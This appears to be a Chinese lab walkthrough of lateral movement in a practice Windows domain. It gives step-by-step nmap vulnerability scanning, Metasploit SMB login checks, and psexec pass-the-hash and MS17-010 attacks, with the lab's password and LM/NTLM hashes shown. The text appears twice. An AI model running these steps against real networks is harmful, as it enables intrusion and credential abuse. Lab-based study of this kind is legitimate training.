內網橫向滲透 之 ATT&CK系列一 之 橫向滲透域主機
前言
上一篇文章中已獲取了關於域的一些基本資訊,在這裡再整理一下,不知道資訊收集的小夥伴可以看回上一篇文章哦
域:god.org
域控 windows server 2008:OWA,192.168.52.138
域主機 windows server 2003:ROOT-TVI862UBEH,192.168.52.141
win7內網ip:192.168.52.143
win7 username : Administrator domain : GOD password : hongrisec@2022(因為登陸域控機win2008的時候會要求改密碼,我這個改成hongrisec@2022)
LM:edea194d76c77d87923b4276177762ae;NTLM:8c535a2d84c3b21059d667639bb89db5
橫向滲透
通過win7的nmap對域成員進行漏洞埠掃描,使用 where nmap 可以得到nmap的安裝路徑
nmap.exe --script=vuln 192.168.52.141
存在ms08-067(CVE-2008-4250)、ms17-010(CVE-2017-0143)
使用 scanner/smb/smb_login 驗證SMB登入
use scanner/smb/smb_login set RHOSTS 192.168.52.141 set SMBPass hongrisec@2022 set SMBUSER Administrator set SMBDomain GOD run
說明win7的賬號密碼對域成員也有效
至此,域成員存在漏洞,且知道使用者名稱、密碼、域,使用漏洞進行滲透獲取域內使用許可權
因為是內網windows系統,這裡我選擇用雜湊傳遞攻擊,使用的模組是 exploit/windows/smb/psexec
use exploit/windows/smb/psexec
set payload windows/shell/bind_tcp set RHOSTS 192.168.52.141 set SMBDomain god set SMBUser Administrator set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5 # 這裡是用雜湊密碼傳遞,冒號前面的是LM雜湊值,冒號後面的是NTLM雜湊值run
檢視許可權 whoami
可以看到,是管理員的最高許可權,這裡就不需要提權了,至此,域主機已被攻破!
彩蛋
域主機 windows server 2003 存在ms17-010漏洞,可以通過ms17-010漏洞進行攻擊
注:msfconsole中的ms17_010_eternalblue模組僅支援x64,而咱們的目標域主機是x86的,所以這裡不適用
使用模組 ms17_010_psexec 進行攻擊,這裡選擇這個模組的原因:在域內,且存在ms17-010漏洞
use exploit/windows/smb/ms17_010_psexec set RHOSTS 192.168.52.141 set SMBDomain GOD set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5 set SMBUser Administrator run
域主機藍屏
msfconsole報錯
至此攻擊成功,沒有反彈shell,因為目標域主機已藍屏!
TRANSLATE with x English TRANSLATE with EMBED THE SNIPPET BELOW IN YOUR SITE Enable collaborative features and customize widget: Bing Webmaster Portal Back
前言
上一篇文章中已獲取了關於域的一些基本資訊,在這裡再整理一下,不知道資訊收集的小夥伴可以看回上一篇文章哦
域:god.org
域控 windows server 2008:OWA,192.168.52.138
域主機 windows server 2003:ROOT-TVI862UBEH,192.168.52.141
win7內網ip:192.168.52.143
win7 username : Administrator domain : GOD password : hongrisec@2022(因為登陸域控機win2008的時候會要求改密碼,我這個改成hongrisec@2022)
LM:edea194d76c77d87923b4276177762ae;NTLM:8c535a2d84c3b21059d667639bb89db5
橫向滲透
通過win7的nmap對域成員進行漏洞埠掃描,使用 where nmap 可以得到nmap的安裝路徑
nmap.exe --script=vuln 192.168.52.141
存在ms08-067(CVE-2008-4250)、ms17-010(CVE-2017-0143)
使用 scanner/smb/smb_login 驗證SMB登入
use scanner/smb/smb_login set RHOSTS 192.168.52.141 set SMBPass hongrisec@2022 set SMBUSER Administrator set SMBDomain GOD run
說明win7的賬號密碼對域成員也有效
至此,域成員存在漏洞,且知道使用者名稱、密碼、域,使用漏洞進行滲透獲取域內使用許可權
因為是內網windows系統,這裡我選擇用雜湊傳遞攻擊,使用的模組是 exploit/windows/smb/psexec
use exploit/windows/smb/psexec
set payload windows/shell/bind_tcp set RHOSTS 192.168.52.141 set SMBDomain god set SMBUser Administrator set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5 # 這裡是用雜湊密碼傳遞,冒號前面的是LM雜湊值,冒號後面的是NTLM雜湊值 run
檢視許可權 whoami
可以看到,是管理員的最高許可權,這裡就不需要提權了,至此,域主機已被攻破!
彩蛋
域主機 windows server 2003 存在ms17-010漏洞,可以通過ms17-010漏洞進行攻擊
注:msfconsole中的ms17_010_eternalblue模組僅支援x64,而咱們的目標域主機是x86的,所以這裡不適用
使用模組 ms17_010_psexec 進行攻擊,這裡選擇這個模組的原因:在域內,且存在ms17-010漏洞
use exploit/windows/smb/ms17_010_psexec set RHOSTS 192.168.52.141 set SMBDomain GOD set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5 set SMBUser Administrator run
域主機藍屏
msfconsole報錯
至此攻擊成功,沒有反彈shell,因為目標域主機已藍屏!